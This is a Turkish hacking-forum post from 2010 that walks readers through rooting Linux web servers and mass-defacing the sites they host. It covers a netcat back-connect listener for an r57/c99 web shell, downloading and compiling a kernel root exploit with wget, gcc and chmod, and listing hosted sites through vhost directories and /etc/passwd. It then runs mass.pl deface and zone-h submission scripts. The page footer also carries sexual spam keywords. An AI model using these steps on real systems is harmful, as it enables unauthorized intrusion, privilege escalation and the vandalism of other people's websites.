AnaSayfa    Sosyal Ortam    Şikayetler    Duyurular    Şikayetim Var!    Genel Kültür   
SaboTaj ~ SaboTaj. iN ~ SaboTe ~ SaboTaj TeAm ~ SaboTage ~  SaboTaj Destek Sitesi!! SaboTaj ~ SaboTaj. iN ~ SaboTe ~ SaboTaj TeAm ~ SaboTage ~  SaboTaj Destek Sitesi!!
°vBulletin Tasarim + Seo Tasarim + Tema Yapim Edit + Eklenti Kurulum Kodlama + GoogLe Optimizasyon + 7/24 Destek = °KOCKAF52° vpsseo
Alt 11-05-2010   #1 (permalink)
Süper Üye
Sabote - ait Kullanıcı Resmi (Avatar)
Üyelik tarihi: May 2010
Mesajlar: 720
Konular: 659
Tecrübe Puanı: 3
Rep Puanı : 11
Kıdemi : Sabote is on a distinguished road
Standart Linux server root (Full anlatım Resimli)

1) netcat (for back connect)

2) r57 yada c99 shell (Back connect opsinoyu bazı c99larda da mevcuttur)

3)mass.pl (çoklu deface için indexleyicidir)

4)zone-h.pl (çoklu deface kaydı içindir)

5) special bir index



Başlayalım başlat çalıştıra cmd yazıp tamam diyoruz


karşımıza siyah ms-dos ekranı gelecek bu ekrana

nc -v -l -p 443 yazalım (ben 443 dedim sizde hangi port açıksa artık) enterlıyalım

Ufak bi not: (bazen sizin portunuz açık olabilir ama serverin o portu açık olmayabilir

açık server portunu Nmap - Zenmap GUI programı bize soyluyor. bununla tarayabilirniz)

evet ornek olarak r57 shellimizde de back connect yerine 443 yazıyoruz















evet baglandık
serverimiz 2007 sürümü 2.6.22



exploitimizi googledan veya milw0rm dan arayıp bulduktan sonra




serverin yazma silme izni olan bi klasorune atıyoruz genelde tmp ye atılır tmp dizinleri iki kısımdır birisi dizin olarak /tmp dizinindedir diğeri ise /home1/corppmco/public_html/tmp dizinindedir


ikinci verdiğim joomla sitelerdedir.

wget komutuyla exploiti server upload edelim ornek olarak

wget [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]

exploitlerin uzantısı c dir c diliyle yazıldıklarından dolayı

not: bazı serverlar wget komutunu kabul etmez shellden manuel upload da uygun bir yoldur.

attıgımız exploiti derleyecegiz şimdi ( derleme işleminde yeni isim verecegiz)

gcc -o root 2.6.22.c (root yazdımız yere istediginizi yazabilirsiniz)

chmod ayarı yapacagız

chmod 777 root dedikten sonra explotimizi çağırmaya geldi sıra

./root diyerek exploitimizi çağırıyoruz (alttaki resimde oldugu gibi)



bazen hemen bazen bi süre bekledikten sonra cevap gelir sabırlı olun

id komutuyla kontrol edelim



evet serverimiz rootlandı

whoami komutuylada bu görüyoruz (verdiğimiz isim çıkmalıdır)

uid=0 ı gorduk

şimdi musait bi yere indeximizi ve mass.pl yi atalım

serverdakileri siteleri gormek içinse çok çeşitli yollarımız mevcuttur

bu komutlar :

/etc/vdomainaliases/

/etc/vfilters/

/var/www/vhosts/

/var/named/

/etc/passwd/

/etc/hosts/

/etc/apache/

/etc/apache2/

/etc/named.conf/ gibi

bizimki /var/www/vhosts/ cd /var/www/hosts/ komutunu verdikten sonra

ls (LS yani) komutuyla sıralayıp gorebiliriz yada izinler açıksa shellden o dizine gecebiliriz



siteleri bulup bilgisayarımızda C:/Perl/bin/ klasorunun içine hack.txt diyer kayıt edin.(bilgilsayarınızda perl Programı yuklu olmalıdır)

kayıt ettikten sonra dos ekranında mass deface işlemine gecelim



önce ekrana perl mas.pl yazıp nasıl çalıştıgınız kontrol ediyoruz daha sonra uygulamaya geciyoruz (orda example ı veriyor)

mass deface biraz zaman alabilir sabırlı olmak gerek

işlem bitince all homepages defaced diye bi yazı gelecek bu yazıdan sonra yine başlat çalıştır cmd ye geliyoruz

cd..

cd..

cd perl

cd bin

perl zoneh.pl hack.txt XXXXX (nickimi yazdım) yazıp enter diyoruz



Alıntıdır
Sabote isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Cevapla

Etiketler
anlatım, full, linux, resimli, root, server


Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil


Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
server rootlamak , linux root , server hack Videolu anlatım #KhrYsaOR# Sabote Tüm oyunlar 1 15-07-2011 04:47 PM
Linux server root (Full anlatım Resimli) Kam_06 Yeni Başlayanlar 23 15-02-2011 11:31 AM
auto linux server root 2010 2009 2008 2007 2005 2004 download indir kockaf52 Shell * Exploitler Arşivi 1 02-09-2010 07:06 PM
Istek linux server root FT-CapitaL HackTube 1 04-06-2010 03:38 PM
Linux Server Root { Resimli } Sabote Tüm oyunlar 0 11-05-2010 10:16 PM

Her mesajin içeriginden, sadece ve sadece yazari sorumludur.
Mesaj içeriklerinden dolayi Forum yöneticileri ve moderatörleri sorumlu tutulamaz.
Ayrica bu site dosyalari kendi sunucusunda barindirmamaktadir ve sorumluluklari kaynaklara aittir.
Hak sahibinin talebi durumunda sitemizden kaldirilacaktir.SaboTaj.Org Yönetim!!..

bayan escort escort istanbul anal sikiş istanbul escort escort escort bayan escort izmir


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.6.0
Copyright Owners SBT. 2010
Protected by Stadt-LahrStadt-Lahr.Com
| SaboTaj | Stadt-Lahr | Sitemap | EtiKet | AleXa | FeedBurner | FriendFeed | YaHoo | iGoogLe |

indir casus telefon telefon dinleme dinleme cihazları notebook batarya Araç takip araç takip sistemleri zayıflama bitkisel zayıflama ukash vps top patlatma oyunları erken rezervasyon ucuz tatil zayıflama kızlık zarı dikimi medikal ürünleri Evden Eve Nakliyat firmaları Notebook Tamiri chat film izle Göbek Eritme Bandı Belgesel ukash ukashBedava Okey Okey oyunankara ilaçlamaankara ilaçlama